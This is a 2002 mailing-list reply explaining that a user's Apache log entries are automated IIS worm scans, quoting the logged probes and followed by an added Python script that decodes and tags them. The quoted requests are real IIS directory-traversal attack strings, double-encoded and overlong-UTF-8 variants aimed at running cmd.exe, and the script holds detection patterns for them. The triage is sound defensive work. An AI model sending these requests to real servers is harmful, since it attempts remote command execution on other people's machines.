
Re: Strange httpd/access_log entry



Unless you're running IIS, you don't have to worry about those.  Those
are the entries generated by a machine infected with the code red IIS
thing or one of the variants (code red's a virus, not a trojan, right?).
Anyway, an infected machine picks a bunch of other IPs to scan for
vulnerable scripts - the list you see is a list of common IIS vulnerable
scripts.  Some variants scan random IPs, some scan their whole class C,
some pick IPs differently.  Either way, it's probably not a real person
scanning you.  You might send a message to the admin for that IP, but if
they're still having problems with that vulnerability, they're probably
not the most diligent admin around. :)

--Danny

On Thu, Apr 11, 2002 at 11:52:33AM -0500, Gary wrote:
> Can anyone help me out here... 
> 
> I found these entries, is someone trying to hack me?  
> What is really weird is in a browser, if I type file://64.163.212.171/
> I get the entire listing for my HD
> 
> Doing a host -a 64.163.212.171 yields a reverse entry for pacbel... 
> 
> Log entries are:
> 
> 64.163.212.171 - - [11/Apr/2002:11:01:34 -0500] "GET
> /scripts/root.exe?/c+dir HTTP/1.0" 404 290 "-" "-"
> 64.163.212.171 - - [11/Apr/2002:11:01:35 -0500] "GET
> /MSADC/root.exe?/c+dir HTTP/1.0" 404 288 "-" "-"
> 64.163.212.171 - - [11/Apr/2002:11:01:35 -0500] "GET
> /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298 "-" "-"
> 64.163.212.171 - - [11/Apr/2002:11:01:36 -0500] "GET
> /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298 "-" "-"
> 64.163.212.171 - - [11/Apr/2002:11:01:39 -0500] "GET
> /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312 "-"
> "-"
> 64.163.212.171 - - [11/Apr/2002:11:01:40 -0500] "GET
> /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 329 "-" "-"
> 64.163.212.171 - - [11/Apr/2002:11:01:40 -0500] "GET
> /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 329 "-" "-"
> 64.163.212.171 - - [11/Apr/2002:11:01:41 -0500] "GET
> /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 345 "-" "-"
> 64.163.212.171 - - [11/Apr/2002:11:01:41 -0500] "GET
> /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311 "-"
> "-"
> 64.163.212.171 - - [11/Apr/2002:11:01:42 -0500] "GET
> /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311 "-"
> "-"
> 64.163.212.171 - - [11/Apr/2002:11:01:42 -0500] "GET
> /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311 "-"
> "-"
> 64.163.212.171 - - [11/Apr/2002:11:01:43 -0500] "GET
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311 "-"
> "-"
> 64.163.212.171 - - [11/Apr/2002:11:01:47 -0500] "GET
> /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 295 "-"
> "-"
> 64.163.212.171 - - [11/Apr/2002:11:01:47 -0500] "GET
> /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 295 "-"
> "-"
> 64.163.212.171 - - [11/Apr/2002:11:01:51 -0500] "GET
> /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312
> "-" "-"
> 64.163.212.171 - - [11/Apr/2002:11:01:51 -0500] "GET
> /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312 "-"
> "-"
> 
> 
> -- 
> Best regards,
> Gary   
> 
> 
> -
> To unsubscribe, send email to majordomo@luci.org with
> "unsubscribe luci-discuss" in the body.
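
The triage described in the reply above, as an added example that is not part of the original thread: it parses Apache access-log lines, percent-decodes each request path repeatedly, tags the IIS-targeted probe patterns seen in the quoted log, and reports per client whether any probe received a non-error response. The sample lines are constructed (documentation addresses in 192.0.2.0/24, request paths taken from the quoted log, each entry on one unwrapped line); the function and tag names are this example's own.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_to_bytes

# Apache common/combined log line: client, timestamp, request line, status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+)[^"]*" (\d{3})')
CHECKS = {  # tag -> pattern applied to the fully decoded path bytes
    "iis-shell-target": re.compile(rb"(?:cmd|root)\.exe", re.I),
    "traversal": re.compile(rb"\.\.[/\\]"),
    # 0xC0/0xC1 lead bytes appear only in overlong UTF-8 (e.g. %c0%af for "/")
    "overlong-utf8": re.compile(rb"[\xc0\xc1]."),
}

def decode_fully(raw, max_rounds=4):
    """Percent-decode until stable, so %255c -> %5c -> backslash is visible."""
    data, rounds = raw.encode("utf-8"), 0
    while rounds < max_rounds and (decoded := unquote_to_bytes(data)) != data:
        data, rounds = decoded, rounds + 1
    return data, rounds

def classify(line):
    """Return (client, status, tags) for a probe line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    client, url, status = m.groups()
    path, rounds = decode_fully(url.split("?", 1)[0])
    tags = {tag for tag, rx in CHECKS.items() if rx.search(path)}
    if rounds > 1:
        tags.add("double-encoded")
    return (client, int(status), tags) if tags else None

def summarize(lines):
    """Per client: probe count, tags seen, and probes the server answered."""
    report = defaultdict(lambda: {"probes": 0, "tags": set(), "answered": 0})
    for client, status, tags in filter(None, map(classify, lines)):
        entry = report[client]
        entry["probes"] += 1
        entry["tags"] |= tags
        entry["answered"] += status < 400  # 2xx/3xx: request was not rejected
    return dict(report)

# Constructed sample input (paths from the quoted log, placeholder addresses).
SAMPLE = [
    '192.0.2.10 - - [11/Apr/2002:11:01:34 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 290 "-" "-"',
    '192.0.2.10 - - [11/Apr/2002:11:01:39 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312 "-" "-"',
    '192.0.2.10 - - [11/Apr/2002:11:01:42 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311 "-" "-"',
    '192.0.2.44 - - [11/Apr/2002:11:02:10 -0500] "GET /index.html HTTP/1.0" 200 1043 "-" "Mozilla/4.0"',
]
if __name__ == "__main__":
    print(summarize(SAMPLE))
```

An `answered` count of zero matches the all-404/400 pattern in the quoted log; a nonzero count is the case that would need a closer look.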
